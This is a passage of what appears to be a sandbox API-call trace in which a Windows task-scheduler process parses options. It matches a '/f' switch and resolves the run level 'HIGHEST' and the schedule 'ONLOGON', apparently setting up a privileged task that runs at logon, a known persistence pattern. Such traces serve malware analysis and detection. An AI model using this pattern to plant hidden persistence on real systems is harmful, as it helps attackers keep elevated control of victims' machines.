(lpString="|create|") returned 8 [0189.257] lstrlenW (lpString="|f|") returned 3 [0189.257] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0 [0189.257] RtlRestoreLastWin32Error () returned 0x490 [0189.257] lstrlenW (lpString="?") returned 1 [0189.257] lstrlenW (lpString="?") returned 1 [0189.257] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.257] lstrlenW (lpString="f") returned 1 [0189.257] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.257] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0189.257] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.257] lstrlenW (lpString="|?|") returned 3 [0189.257] lstrlenW (lpString="|f|") returned 3 [0189.257] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0 [0189.257] RtlRestoreLastWin32Error () returned 0x490 [0189.257] lstrlenW (lpString="s") returned 1 [0189.257] lstrlenW (lpString="s") returned 1 [0189.257] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.258] lstrlenW (lpString="f") returned 1 [0189.258] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.258] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0189.258] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.258] lstrlenW (lpString="|s|") returned 3 [0189.258] lstrlenW (lpString="|f|") returned 3 [0189.258] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0 [0189.258] RtlRestoreLastWin32Error () returned 0x490 [0189.258] lstrlenW (lpString="u") returned 1 [0189.258] lstrlenW (lpString="u") returned 1 [0189.258] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.258] lstrlenW (lpString="f") returned 1 [0189.258] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.258] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0189.258] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.258] lstrlenW (lpString="|u|") returned 3 [0189.258] lstrlenW (lpString="|f|") returned 3 [0189.258] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0 [0189.258] RtlRestoreLastWin32Error () returned 0x490 [0189.258] lstrlenW (lpString="p") returned 1 [0189.259] lstrlenW (lpString="p") returned 1 [0189.259] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.259] lstrlenW (lpString="f") returned 1 [0189.259] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.259] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0189.259] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.259] lstrlenW (lpString="|p|") returned 3 [0189.259] lstrlenW (lpString="|f|") returned 3 [0189.259] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0 [0189.259] RtlRestoreLastWin32Error () returned 0x490 [0189.259] lstrlenW (lpString="ru") returned 2 [0189.259] lstrlenW (lpString="ru") returned 2 [0189.259] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.259] lstrlenW (lpString="f") returned 1 [0189.259] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.259] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0189.259] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.259] lstrlenW (lpString="|ru|") returned 4 [0189.259] lstrlenW (lpString="|f|") returned 3 [0189.259] StrStrIW (lpFirst="|ru|", lpSrch="|f|") returned 0x0 [0189.259] RtlRestoreLastWin32Error () returned 0x490 [0189.260] lstrlenW (lpString="rp") returned 2 [0189.260] lstrlenW (lpString="rp") returned 2 [0189.260] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.260] lstrlenW (lpString="f") returned 1 [0189.260] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.260] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0189.260] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.260] lstrlenW (lpString="|rp|") returned 4 [0189.260] lstrlenW (lpString="|f|") returned 3 [0189.260] StrStrIW (lpFirst="|rp|", lpSrch="|f|") returned 0x0 [0189.260] RtlRestoreLastWin32Error () returned 0x490 [0189.260] lstrlenW (lpString="sc") returned 2 [0189.260] lstrlenW (lpString="sc") returned 2 [0189.260] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.260] lstrlenW (lpString="f") returned 1 [0189.260] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.260] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.260] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.260] lstrlenW (lpString="|sc|") returned 4 [0189.260] lstrlenW (lpString="|f|") returned 3 [0189.260] StrStrIW (lpFirst="|sc|", lpSrch="|f|") returned 0x0 [0189.260] RtlRestoreLastWin32Error () returned 0x490 [0189.260] lstrlenW (lpString="mo") returned 2 [0189.260] lstrlenW (lpString="mo") returned 2 [0189.260] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.261] lstrlenW (lpString="f") returned 1 [0189.261] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.261] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0189.261] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.261] lstrlenW (lpString="|mo|") returned 4 [0189.261] lstrlenW (lpString="|f|") returned 3 [0189.261] StrStrIW (lpFirst="|mo|", lpSrch="|f|") returned 0x0 [0189.261] RtlRestoreLastWin32Error () returned 0x490 [0189.261] lstrlenW (lpString="d") returned 1 [0189.261] lstrlenW (lpString="d") returned 1 [0189.261] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.261] lstrlenW (lpString="f") returned 1 [0189.261] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.261] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0189.261] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.261] lstrlenW (lpString="|d|") returned 3 [0189.261] lstrlenW (lpString="|f|") returned 3 [0189.261] StrStrIW (lpFirst="|d|", lpSrch="|f|") returned 0x0 [0189.261] RtlRestoreLastWin32Error () returned 0x490 [0189.261] lstrlenW (lpString="m") returned 1 [0189.261] lstrlenW (lpString="m") returned 1 [0189.261] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.261] lstrlenW (lpString="f") returned 1 [0189.261] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.261] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0189.261] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.261] lstrlenW (lpString="|m|") returned 3 [0189.262] lstrlenW (lpString="|f|") returned 3 [0189.262] StrStrIW (lpFirst="|m|", lpSrch="|f|") returned 0x0 [0189.262] RtlRestoreLastWin32Error () returned 0x490 [0189.262] lstrlenW (lpString="i") returned 1 [0189.262] lstrlenW (lpString="i") returned 1 [0189.262] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.262] lstrlenW (lpString="f") returned 1 [0189.262] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.262] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0189.262] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.262] lstrlenW (lpString="|i|") returned 3 [0189.262] lstrlenW (lpString="|f|") returned 3 [0189.262] StrStrIW (lpFirst="|i|", lpSrch="|f|") returned 0x0 [0189.262] RtlRestoreLastWin32Error () returned 0x490 [0189.262] lstrlenW (lpString="tn") returned 2 [0189.262] lstrlenW (lpString="tn") returned 2 [0189.262] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.262] lstrlenW (lpString="f") returned 1 [0189.262] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.262] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.262] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.262] lstrlenW (lpString="|tn|") returned 4 [0189.263] lstrlenW (lpString="|f|") returned 3 [0189.263] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0 [0189.263] RtlRestoreLastWin32Error () returned 0x490 [0189.263] lstrlenW (lpString="tr") returned 2 [0189.263] lstrlenW (lpString="tr") returned 2 [0189.263] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.263] lstrlenW (lpString="f") returned 1 [0189.263] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.263] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.263] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.263] lstrlenW (lpString="|tr|") returned 4 [0189.263] lstrlenW (lpString="|f|") returned 3 [0189.263] StrStrIW (lpFirst="|tr|", lpSrch="|f|") returned 0x0 [0189.263] RtlRestoreLastWin32Error () returned 0x490 [0189.263] lstrlenW (lpString="st") returned 2 [0189.263] lstrlenW (lpString="st") returned 2 [0189.263] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.263] lstrlenW (lpString="f") returned 1 [0189.263] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.263] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|st|") returned 4 [0189.263] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.263] lstrlenW (lpString="|st|") returned 4 [0189.263] lstrlenW (lpString="|f|") returned 3 [0189.263] StrStrIW (lpFirst="|st|", lpSrch="|f|") returned 0x0 [0189.263] RtlRestoreLastWin32Error () returned 0x490 [0189.264] lstrlenW (lpString="sd") returned 2 [0189.264] lstrlenW (lpString="sd") returned 2 [0189.264] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.264] lstrlenW (lpString="f") returned 1 [0189.264] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.264] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sd|") returned 4 [0189.264] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.264] lstrlenW (lpString="|sd|") returned 4 [0189.264] lstrlenW (lpString="|f|") returned 3 [0189.264] StrStrIW (lpFirst="|sd|", lpSrch="|f|") returned 0x0 [0189.264] RtlRestoreLastWin32Error () returned 0x490 [0189.264] lstrlenW (lpString="ed") returned 2 [0189.264] lstrlenW (lpString="ed") returned 2 [0189.264] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.264] lstrlenW (lpString="f") returned 1 [0189.264] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.265] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ed|") returned 4 [0189.265] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.265] lstrlenW (lpString="|ed|") returned 4 [0189.265] lstrlenW (lpString="|f|") returned 3 [0189.265] StrStrIW (lpFirst="|ed|", lpSrch="|f|") returned 0x0 [0189.265] RtlRestoreLastWin32Error () returned 0x490 [0189.265] lstrlenW (lpString="it") returned 2 [0189.265] lstrlenW (lpString="it") returned 2 [0189.265] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.265] lstrlenW (lpString="f") returned 1 [0189.265] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.265] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|it|") returned 4 [0189.265] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.265] lstrlenW (lpString="|it|") returned 4 [0189.265] lstrlenW (lpString="|f|") returned 3 [0189.265] StrStrIW (lpFirst="|it|", lpSrch="|f|") returned 0x0 [0189.265] RtlRestoreLastWin32Error () returned 0x490 [0189.265] lstrlenW (lpString="et") returned 2 [0189.265] lstrlenW (lpString="et") returned 2 [0189.265] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.265] lstrlenW (lpString="f") returned 1 [0189.265] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.265] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|et|") returned 4 [0189.265] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.265] lstrlenW (lpString="|et|") returned 4 [0189.265] lstrlenW (lpString="|f|") returned 3 [0189.266] StrStrIW (lpFirst="|et|", lpSrch="|f|") returned 0x0 [0189.266] RtlRestoreLastWin32Error () returned 0x490 [0189.266] lstrlenW (lpString="k") returned 1 [0189.266] lstrlenW (lpString="k") returned 1 [0189.266] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.266] lstrlenW (lpString="f") returned 1 [0189.266] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.266] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|k|") returned 3 [0189.266] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.266] lstrlenW (lpString="|k|") returned 3 [0189.266] lstrlenW (lpString="|f|") returned 3 [0189.266] StrStrIW (lpFirst="|k|", lpSrch="|f|") returned 0x0 [0189.266] RtlRestoreLastWin32Error () returned 0x490 [0189.266] lstrlenW (lpString="du") returned 2 [0189.266] lstrlenW (lpString="du") returned 2 [0189.266] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.266] lstrlenW (lpString="f") returned 1 [0189.266] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.266] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|du|") returned 4 [0189.266] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.266] lstrlenW (lpString="|du|") returned 4 [0189.266] lstrlenW (lpString="|f|") returned 3 [0189.266] StrStrIW (lpFirst="|du|", lpSrch="|f|") returned 0x0 [0189.266] RtlRestoreLastWin32Error () returned 0x490 [0189.267] lstrlenW (lpString="ri") returned 2 [0189.267] lstrlenW (lpString="ri") returned 2 [0189.267] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.267] lstrlenW (lpString="f") returned 1 [0189.267] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.267] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ri|") returned 4 [0189.267] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.267] lstrlenW (lpString="|ri|") returned 4 [0189.267] lstrlenW (lpString="|f|") returned 3 [0189.267] StrStrIW (lpFirst="|ri|", lpSrch="|f|") returned 0x0 [0189.267] RtlRestoreLastWin32Error () returned 0x490 [0189.267] lstrlenW (lpString="z") returned 1 [0189.267] lstrlenW (lpString="z") returned 1 [0189.267] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.267] lstrlenW (lpString="f") returned 1 [0189.267] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.267] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|z|") returned 3 [0189.267] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.267] lstrlenW (lpString="|z|") returned 3 [0189.267] lstrlenW (lpString="|f|") returned 3 [0189.267] StrStrIW (lpFirst="|z|", lpSrch="|f|") returned 0x0 [0189.267] RtlRestoreLastWin32Error () returned 0x490 [0189.267] lstrlenW (lpString="f") returned 1 [0189.267] lstrlenW (lpString="f") returned 1 [0189.267] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.267] lstrlenW (lpString="f") returned 1 [0189.268] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.268] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.268] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3 [0189.268] lstrlenW (lpString="|f|") returned 3 [0189.268] lstrlenW (lpString="|f|") returned 3 [0189.268] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|" [0189.268] RtlRestoreLastWin32Error () returned 0x0 [0189.268] RtlRestoreLastWin32Error () returned 0x0 [0189.268] GetProcessHeap () returned 0x4780000 [0189.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789550 [0189.268] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.268] LoadStringW (in: hInstance=0x0, uID=0x20d, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="LIMITED") returned 0x7 [0189.268] lstrlenW (lpString="LIMITED") returned 7 [0189.268] GetProcessHeap () returned 0x4780000 [0189.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x478ac48 [0189.268] GetThreadLocale () returned 0x409 [0189.268] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="HIGHEST", cchCount1=-1, lpString2="LIMITED", cchCount2=-1) returned 1 [0189.268] GetProcessHeap () returned 0x4780000 [0189.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789570 [0189.268] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.268] LoadStringW (in: hInstance=0x0, uID=0x20e, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="HIGHEST") returned 0x7 [0189.268] lstrlenW (lpString="HIGHEST") returned 7 [0189.268] GetProcessHeap () returned 0x4780000 [0189.268] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x478ac78 [0189.268] GetThreadLocale () returned 0x409 [0189.268] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="HIGHEST", cchCount1=-1, lpString2="HIGHEST", cchCount2=-1) returned 2 [0189.268] GetProcessHeap () returned 0x4780000 [0189.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47895b0 [0189.269] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.269] LoadStringW (in: hInstance=0x0, uID=0x1ae, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="MINUTE") returned 0x6 [0189.269] lstrlenW (lpString="MINUTE") returned 6 [0189.269] GetProcessHeap () returned 0x4780000 [0189.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0xe) returned 0x478abb8 [0189.269] GetThreadLocale () returned 0x409 [0189.269] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="MINUTE", cchCount2=-1) returned 3 [0189.269] GetProcessHeap () returned 0x4780000 [0189.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47893d0 [0189.269] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.269] LoadStringW (in: hInstance=0x0, uID=0x1af, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="HOURLY") returned 0x6 [0189.269] lstrlenW (lpString="HOURLY") returned 6 [0189.269] GetProcessHeap () returned 0x4780000 [0189.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0xe) returned 0x478ab40 [0189.269] GetThreadLocale () returned 0x409 [0189.269] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="HOURLY", cchCount2=-1) returned 3 [0189.269] GetProcessHeap () returned 0x4780000 [0189.269] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789330 [0189.269] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.269] LoadStringW (in: hInstance=0x0, uID=0x1b0, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="DAILY") returned 0x5 [0189.269] lstrlenW (lpString="DAILY") returned 5 [0189.270] GetProcessHeap () returned 0x4780000 [0189.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0xc) returned 0x478aaf8 [0189.270] GetThreadLocale () returned 0x409 [0189.270] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="DAILY", cchCount2=-1) returned 3 [0189.270] GetProcessHeap () returned 0x4780000 [0189.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789350 [0189.270] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.270] LoadStringW (in: hInstance=0x0, uID=0x1b1, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="WEEKLY") returned 0x6 [0189.270] lstrlenW (lpString="WEEKLY") returned 6 [0189.270] GetProcessHeap () returned 0x4780000 [0189.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0xe) returned 0x478ac60 [0189.270] GetThreadLocale () returned 0x409 [0189.270] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="WEEKLY", cchCount2=-1) returned 1 [0189.270] GetProcessHeap () returned 0x4780000 [0189.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47893b0 [0189.270] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.270] LoadStringW (in: hInstance=0x0, uID=0x1b2, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="MONTHLY") returned 0x7 [0189.270] lstrlenW (lpString="MONTHLY") returned 7 [0189.270] GetProcessHeap () returned 0x4780000 [0189.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x478aa50 [0189.270] GetThreadLocale () returned 0x409 [0189.270] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="MONTHLY", cchCount2=-1) returned 3 [0189.270] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.270] LoadStringW (in: hInstance=0x0, uID=0x1b3, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="ONCE") returned 0x4 [0189.271] lstrlenW (lpString="ONCE") returned 4 [0189.271] GetProcessHeap () returned 0x4780000 [0189.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0xa) returned 0x478ab10 [0189.271] GetThreadLocale () returned 0x409 [0189.271] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="ONCE", cchCount2=-1) returned 3 [0189.271] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.271] LoadStringW (in: hInstance=0x0, uID=0x1b4, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="ONSTART") returned 0x7 [0189.271] lstrlenW (lpString="ONSTART") returned 7 [0189.271] GetThreadLocale () returned 0x409 [0189.271] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="ONSTART", cchCount2=-1) returned 1 [0189.271] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.271] LoadStringW (in: hInstance=0x0, uID=0x1b5, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="ONLOGON") returned 0x7 [0189.271] lstrlenW (lpString="ONLOGON") returned 7 [0189.271] GetThreadLocale () returned 0x409 [0189.271] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="ONLOGON", cchCount1=-1, lpString2="ONLOGON", cchCount2=-1) returned 2 [0189.271] RtlRestoreLastWin32Error () returned 0x0 [0189.271] GetProcessHeap () returned 0x4780000 [0189.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x1fc) returned 0x4789dc0 [0189.271] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.271] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0189.271] lstrlenW (lpString="First") returned 5 [0189.271] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.272] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0189.272] lstrlenW (lpString="Second") returned 6 [0189.272] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.272] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0189.272] lstrlenW (lpString="Third") returned 5 [0189.272] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.272] 